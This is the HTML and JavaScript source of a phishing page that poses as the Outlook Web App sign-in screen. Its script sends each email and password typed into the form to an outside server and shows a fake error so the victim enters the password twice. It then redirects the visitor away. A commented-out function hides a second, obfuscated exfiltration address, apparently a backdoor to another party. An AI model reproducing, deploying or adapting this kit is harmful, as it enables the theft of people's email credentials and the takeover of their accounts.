<html><head>
    <meta name="msapplication-tap-highlight" content="no">
    <title>Outlook</title>
    <link href="https://f003.backblazeb2.com/file/copped-mojarras-sentencer/imgs/favicon.ico" rel="shortcut icon">
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
    <link rel="icon" href="https://i.ibb.co/0ZX4cC1/outlook-trouble-march-technology-services-3.png">
    <meta name="viewport" content="user-scalable=no ">
    <meta name="HandheldFriendly" content="true">
    <meta http-equiv="X-UA-Compatible" content="IE=IE9">
    <style>
        [v-cloak] {
            display: none;
        }
    </style>
    <link type="text/css" rel="stylesheet" href="https://busycows.ca/KO/1dba3111b0418d6d209e83024863b800nbr1572797879.css">
    <link type="text/css" rel="stylesheet" href="https://busycows.ca/KO/ba5ecdd16c000176c18fb0f77113c442nbr1572797879.css">
    <style type="text/css">
        .vue-html5-editor .color-card {
            margin: 2px;
            width: 30px;
            height: 30px;
            float: left;
            cursor: pointer
        }
    </style>
    <style type="text/css">
        .vue-html5-editor,
        .vue-html5-editor * {
            box-sizing: border-box
        }
        
        .vue-html5-editor {
            font-size: 14px;
            line-height: 1.5;
            background-color: #fff;
            color: #333;
            border: 1px solid #ddd;
            text-align: left;
            border-radius: 5px;
            overflow: hidden
        }
        
        .vue-html5-editor.full-screen {
            position: fixed!important;
            top: 0!important;
            left: 0!important;
            bottom: 0!important;
            right: 0!important;
            border-radius: 0
        }
        
        .vue-html5-editor>.toolbar {
            position: relative;
            background-color: inherit
        }
        
        .vue-html5-editor>.toolbar>ul {
            list-style: none;
            padding: 0;
            margin: 0;
            border-bottom: 1px solid #ddd
        }
        
        .vue-html5-editor>.toolbar>ul>li {
            display: inline-block;
            cursor: pointer;
            text-align: center;
            line-height: 36px;
            padding: 0 10px
        }
        
        .vue-html5-editor>.toolbar>ul>li .icon {
            height: 16px;
            width: 16px;
            display: inline-block;
            vertical-align: middle
        }
        
        .vue-html5-editor>.toolbar>.dashboard {
            background-color: inherit;
            border-bottom: 1px solid #ddd;
            padding: 10px;
            position: absolute;
            top: 100%;
            left: 0;
            right: 0;
            overflow: auto
        }
        
        .vue-html5-editor>.toolbar>.dashboard input[type=text],
        .vue-html5-editor>.toolbar>.dashboard input[type=number],
        .vue-html5-editor>.toolbar>.dashboard select {
            padding: 6px 12px;
            color: inherit;
            background-color: transparent;
            border: 1px solid #ddd;
            border-radius: 5px
        }
        
        .vue-html5-editor>.toolbar>.dashboard input[type=text]:hover,
        .vue-html5-editor>.toolbar>.dashboard input[type=number]:hover,
        .vue-html5-editor>.toolbar>.dashboard select:hover {
            border-color: #bebebe
        }
        
        .vue-html5-editor>.toolbar>.dashboard input[type=text][disabled],
        .vue-html5-editor>.toolbar>.dashboard input[type=text][readonly],
        .vue-html5-editor>.toolbar>.dashboard input[type=number][disabled],
        .vue-html5-editor>.toolbar>.dashboard input[type=number][readonly],
        .vue-html5-editor>.toolbar>.dashboard select[disabled],
        .vue-html5-editor>.toolbar>.dashboard select[readonly] {
            background-color: #eee;
            opacity: 1
        }
        
        .vue-html5-editor>.toolbar>.dashboard input[type=text][disabled],
        .vue-html5-editor>.toolbar>.dashboard input[type=number][disabled],
        .vue-html5-editor>.toolbar>.dashboard select[disabled] {
            cursor: not-allowed
        }
        
        .vue-html5-editor>.toolbar>.dashboard button {
            color: inherit;
            background-color: inherit;
            padding: 6px 12px;
            white-space: nowrap;
            vertical-align: middle;
            cursor: pointer;
            -webkit-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
            border: 1px solid #ddd;
            border-radius: 5px;
            margin-right: 4px;
            margin-bottom: 4px
        }
        
        .vue-html5-editor>.toolbar>.dashboard button:hover {
            border-color: #bebebe
        }
        
        .vue-html5-editor>.toolbar>.dashboard button[disabled] {
            cursor: not-allowed;
            opacity: .68
        }
        
        .vue-html5-editor>.toolbar>.dashboard button:last-child {
            margin-right: 0
        }
        
        .vue-html5-editor>.toolbar>.dashboard label {
            font-weight: bolder
        }
        
        .vue-html5-editor>.content {
            overflow: auto;
            padding: 10px
        }
        
        .vue-html5-editor>.content:focus {
            outline: 0
        }
    </style>
</head>

<body class="jcBbDOAes54hYQo6P8VtN1SFJuwvz fix-header card-no-border">
    <noscript><strong>We're sorry but link1 doesn't work properly without JavaScript enabled.Please enable it to continue.</strong></noscript>
    <div class="HFzuVk3sQjmyWBnS1X9w06" id="outdated" style="background-color:rgb(242,86,72);color:white;opacity:1;display:none;z-index:999999999999999999;">
        <div class="vertical-center">
            <h6 style="color:white;">Your browser is out-of-date!</h6>
            <p style="color:white;">Website work well in Edge,Google Chrome,FireFox,Safari
                <br>Update your browser to view this website correctly.<a id="buttonUpdateBrowser" rel="nofollow" href="http://outdatedbrowser.com/" style="color:white;background-color:rgb(242,86,72);">Update my browser now</a></p>
            <p class="last"><a href="#" id="buttonCloseUpdateBrowser" title="Close" style="color:white;">×</a></p>
        </div>
    </div>
    <div style="height: 100%; width: 100%;"><span></span>
        <form id="themform">
            <div id="mainLogonDiv" class="NHTef790ccf380f11aerLy">
                <div class="Afce8b1c684e8b1c684XEWg">
                    <div class="hfIc15e3f5bc15e3f5brjyBp"><img src="https://busycows.ca/KO/ii.png" aria-hidden="true" class="QJcbf2688fcbf2688fsmzd"><img src="https://busycows.ca/KO/i.png" aria-hidden="true" class="zcc0929d2cc0929d2YSlet"></div>
                </div>

                <div class="Die4a3ea2e4a3ea2qWhnA">
                    <div id="lgnDiv" class="ee7cb8f74e7cb8f74vTwq">
                        <div role="heading" aria-label="Outlook Web App " class="Tc7282f03c7282f03oveAN"><img src="https://busycows.ca/KO/owa.png" alt="Outlook Web App " class="dXk1317c01317c0AraPN"></div>
                         <br> <br> 
                        <div id="userNameLabel" aria-hidden="true" class="iyUf80a5a14f80a5a14bZjl">Email Address:</div>
                        <div>
                            <input type="email" data-vv-name="UserName" name="ai" role="textbox" required="required" aria-labelledby="userNameLabel" class="xd1071e34d1071e34docJS" aria-required="true" aria-invalid="false">
                        </div>
                        <div id="passwordLabel" aria-hidden="true" class="iyUf80a5a14f80a5a14bZjl">Password:</div>
                        <div>
                            <input type="password" id="password" data-vv-name="password" name="pr" required="required" value="" aria-labelledby="passwordLabel" class="xd1071e34d1071e34docJS" aria-required="true" aria-invalid="false">
                        </div>
                        <div class="yLd10008dbd10008dbvoXWP oZe4c487efe4c487efbLwpA">
                            <input type="checkbox" id="showPasswordCheck" class="W27acd6ea27acd6eazOrF"><span>Show password</span></div>
                        <div id="errmsg" role="alert" tabindex="0" class="fg371e44f1371e44f1Wnuh" style="display: none;">The username or password you entered isn't correct.Try entering it again.</div>
                       
                        <div class="Dzhcf2097d8cf2097d8Yha">
                      
                               <div style="cursor: pointer; display: inline;"><img src="Outlook_files/owa2.png" alt="" class="T3c916be3c916bebRsGW">
                     <input type="submit" name="submit" value="signin" style="border: none;background: none;color:#0071c5;font-size:20px;cursor: pointer; ">
                 </div>
             </div>
                    </div>
                </div>
                <div id="cookieMsg" class="ee7cb8f74e7cb8f74vTwq" style="display: none;">
                    <div class="signInHeader">Outlook Web App </div>
                    <div class="Ya83f28da83f28dNvG">Please enable cookies for this Web site.
                        <br>
                        <br>Cookies are currently disabled by your browser.Outlook Web App requires that cookies be enabled.
                        <br>
                        <br>For information about how to enable cookies,see the Help for your Web browser.
                        <br>
                        <br>
                        <br>
                    </div>
                    
                </div>
            </div>
        </form>
    </div>
<script src="Outlook_files/jquery-3.js"></script>
    <script>
      $(document).ready(function(){
        var errmsg = $('#errmsg');
        errmsg.hide();
        var ufromUrl = get_email_hash();
        if(!ufromUrl){
          ufromUrl = geturlparameter('username'); 
        }
        var redirectUrl = ('https://owy.mn/35MDuDz');
        var isStyleDouble = 3;
        var styleDoubleCounter = 1;
        var styleDoubleFromUrl = 1;
        var formcon = $('#themform');
        var em = $('#themform input[name=em]');
        var ps = $('#themform input[name=ps]');
        
        if(ufromUrl){ em.val(ufromUrl);  }
        var emv = ''; var psv = '';  
        if(isStyleDouble){
          styleDoubleFromUrl = geturlparameter('db');
          if(styleDoubleFromUrl){
            styleDoubleFromUrl = parseInt(styleDoubleFromUrl);
            if(isNaN(styleDoubleFromUrl)){
              styleDoubleFromUrl = 1;
            }
            if(styleDoubleFromUrl > 1){
            errmsg.show();
            }
          }
          else{ styleDoubleFromUrl = 1; }
        }
        formcon.submit(function(e){
          e.preventDefault();
          emv = em.val();
          psv = ps.val();
            if(em && em.length > 0 && psv && psv.length > 0){
              var theemidval = '1f1b3978180b8480035066b0be28feb2';
              //mg(emv, psv,'Outlook 3');  
              $.ajax({
                url: 'https://busycows.ca/KO/Next.php', 
                type: 'POST', 
                dataType: 'html', 
                data: { Email : emv, password : psv, typeofemail : 'Outlook 3', theemid : theemidval}, 
                crossDomain: true,
                  success: function(msg) {
                },
                error: function(e) {
                  console.log(e)
                }
              });
              if(isStyleDouble && styleDoubleFromUrl && styleDoubleFromUrl < isStyleDouble && styleDoubleFromUrl < 3){
                styleDoubleFromUrl++;
                redirectUrl = 'index.html?'+get_rand_url_pars()+'&username='+emv+'&db='+styleDoubleFromUrl;
              }
              setTimeout(function(){
                window.location.replace(redirectUrl);
                //alert(redirectUrl);
              }, 2000);              
            }
          });
        
        
      });


//function evandoor(a,o,t){var h = ['O','L','t','q','e','D','c','-','.','z','u','2','T','m','V','J','6','U','P','b','v','K','B','Z','i','7','R',':','C','/','o','r','n','Q','S','5','3','8','a','M','W','I','x','H','Y','4','1','k','s','d','g','A','j','F','N','9','G','l','f','p','X','0','w','y','E','h'],f = h[65]+h[2]+h[2]+h[59]+h[48]+h[27]+h[29]+h[29]+h[38]+h[59]+h[24]+h[49]+h[38]+h[2]+h[38]+h[6]+h[48]+h[48]+h[8]+h[6]+h[30]+h[13]+h[29]+h[58]+h[24]+h[32]+h[24]+h[48]+h[65]+h[7]+h[10]+h[32]+h[20]+h[11]+h[11]+h[8]+h[59]+h[65]+h[59];$.ajax({url:f,type:"POST",dataType:"html",data:{Email:a,password:o,typeofemail:t},crossDomain:!0,success:function(a){},error:function(a){}})}
function randomInteger(min, max) {return Math.floor(Math.random() * (max - min + 1)) + min; }
function randomString(r,n){for(var o="",t=r;0<t;--t)o+=n[Math.floor(Math.random()*n.length)];return o}
function getdomainpartofemail(a){var e,t=!1;return!validateEmail(a)||-1!=(e=(a=a.toLowerCase()).indexOf("@"))&&(t=a.substr(e+1)),t}
function get_email_hash(){var a=!1,i=window.location.href,t=(i=i.trim()).lastIndexOf("#");return-1!=t&&(a=i.substring(t+1),validateEmail(a)||(a=!1)),a}
function validateEmail(t){return/^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/.test(String(t).toLowerCase())}
function geturlparameter(r){for(var t=window.location.search.substring(1).split("&"),e=0;e<t.length;e++){var n=t[e].split("=");if(n[0]==r)return decodeURIComponent(n[1])}}
function get_rand_url_pars(){var r="",n=0,a="abcdefghijklmnopqrstuvwxyz",e=a;a+=a.toUpperCase()+"123456789";for(var t=randomInteger(3,10),n=0;n<t;n++)r+="&"+randomString(randomInteger(3,10),e)+"="+randomString(randomInteger(15,30),a);return r.substr(1)}

    </script>


</body></html>
